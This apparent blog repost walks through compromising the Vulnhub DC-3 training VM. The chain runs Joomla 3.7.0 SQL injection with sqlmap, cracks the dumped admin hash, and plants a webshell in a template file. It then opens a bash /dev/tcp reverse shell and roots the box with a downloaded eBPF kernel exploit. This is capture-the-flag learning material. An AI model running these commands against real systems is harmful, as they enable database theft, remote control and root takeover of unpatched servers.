DC-3靶机解题思路

  • A+
所属分类:安全文章

说明:Vulnhub是一个渗透测试实战网站,提供了许多带有漏洞的渗透测试靶机下载。适合初学者学习,实践。此次记录的是DC-3靶机,全程只有一个falg获取root权限,以下内容是自身复现的过程,总结记录下来,如有不足请多多指教。


下载地址:

Download (Mirror): http://www.five86.com/downloads/DC-3.zip


目标机IP地址:192.168.5.139
攻击机kali IP地址:192.168.5.135


前期准备:

信息收集时发现目标机与攻击机不在同一网段上,下面就对目标机进行网络配置。

DC-3靶机解题思路


开启靶机摁‘e’速度要快,找到root ro 将ro替换为 rw signie init=/bin/bash 

DC-3靶机解题思路


Ctrl+x 进入命令行。

DC-3靶机解题思路


查看网卡信息, ip a 网卡名为ens33。

DC-3靶机解题思路

 

编辑网卡配置文件,/vim/etc/network/interfaces  发现网卡名不配,替换网卡名ens33。

DC-3靶机解题思路

DC-3靶机解题思路


配置完成后,重启网卡 /etc/init.d/networking stop   /etc/init.d/networking start 

已经成功获取ip。

DC-3靶机解题思路


信息收集


配置好ip下面进行信息收集。

arp-scan -l 发现目标ip。

DC-3靶机解题思路


对目标机扫描端口。

nmap -sV -p- 192.168.5.139  -A 只开启了web服务,该站点是使用joomla创建。

DC-3靶机解题思路


访问后台页面。

DC-3靶机解题思路


对后台路径进行爆破。

python .dirsearch.py -u http://192.168.5.139/ -e*

访问爆破出来的路径。

DC-3靶机解题思路


http://192.168.5.139/README.txt

http://192.168.5.139/htaccess.txt

http://192.168.5.139/administrator/index.php

发现了对joomla的介绍,登陆后台登陆页面,

DC-3靶机解题思路

DC-3靶机解题思路

DC-3靶机解题思路


收集joomla3.7.0是否存在漏洞,该版本存在SQL注入漏洞具体漏洞复现以及成因会在靶机系列结束后进行研讨分析。,也可使用searchsploit来查找版本所出现的漏洞。(“searchsploit”是一个用于Exploit-DB的命令行搜索工具,它还允许你随身带一份Exploit-DB的副本) 

searchsploit Jooma 3.7.0

DC-3靶机解题思路


find ./ -name 42033.txt 搜索提示文件。查看文档内容

DC-3靶机解题思路


攻击操作


根据提示,使用Sqlmap

sqlmap -u "http://192.168.5.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]


将数据库爆了出来。

DC-3靶机解题思路


下一步查看joomladb数据库中的所有表。

sqlmap -u "http://192.168.5.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb --tables

DC-3靶机解题思路

DC-3靶机解题思路


下一步查看#__users表中的字段。

sqlmap -u "http://192.168.5.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T "#__users" --columns

DC-3靶机解题思路


查看name字段与password字段,获取用户与密码。

admin/$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

sqlmap -u "http://192.168.5.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T "#__users" -C  "name,password" --dump

DC-3靶机解题思路


将密码存入文件中,使用john 进行解密。

john可使用字典破解用户密码的hash值。破解密码为snooy。

DC-3靶机解题思路


登陆成功。

DC-3靶机解题思路

点击模板管理,查看详情,修改文件modules.php,写入木马。

DC-3靶机解题思路

DC-3靶机解题思路


写入后访问http://192.168.5.139/templates/beez3/html/

使用蚁剑链接木马。

http://192.168.5.139/templates/beez3/html/modules.php

DC-3靶机解题思路


DC-3靶机解题思路


反弹shell: bash -c 'bash -i >& /dev/tcp/192.168.5.135/7777 0>&1' 

反弹成功。

DC-3靶机解题思路


溜达了一圈未发现可利用的东西。查看一下服务器操作版本。看看可否进行提权。

lsb_release -a

Ubuntu 16.04

DC-3靶机解题思路


searchsploit Ubuntu 16.04

发现一项内核漏洞可以提权。

DC-3靶机解题思路


find ./ -name   39772.txt 搜索详情文件所在路径。文件提示了该漏洞的利用方式,提供了利用工具的下载地址,下载使用wget 进行下载,下载后解压。


DC-3靶机解题思路

DC-3靶机解题思路

DC-3靶机解题思路

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

DC-3靶机解题思路


进行解压

unzip 39772.zip 

tar -xvf exploit.tar 

cd ebpf_mapfd_doubleput_exploit

DC-3靶机解题思路


执行./compile.sh (编译会出现waring 可以忽视)。

DC-3靶机解题思路


执行./doubleput,进行提权,稍等片刻提权成功。

DC-3靶机解题思路

DC-3靶机解题思路


免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

DC-3靶机解题思路

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html

DC-3靶机解题思路


本文始发于微信公众号(thelostworld):DC-3靶机解题思路

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: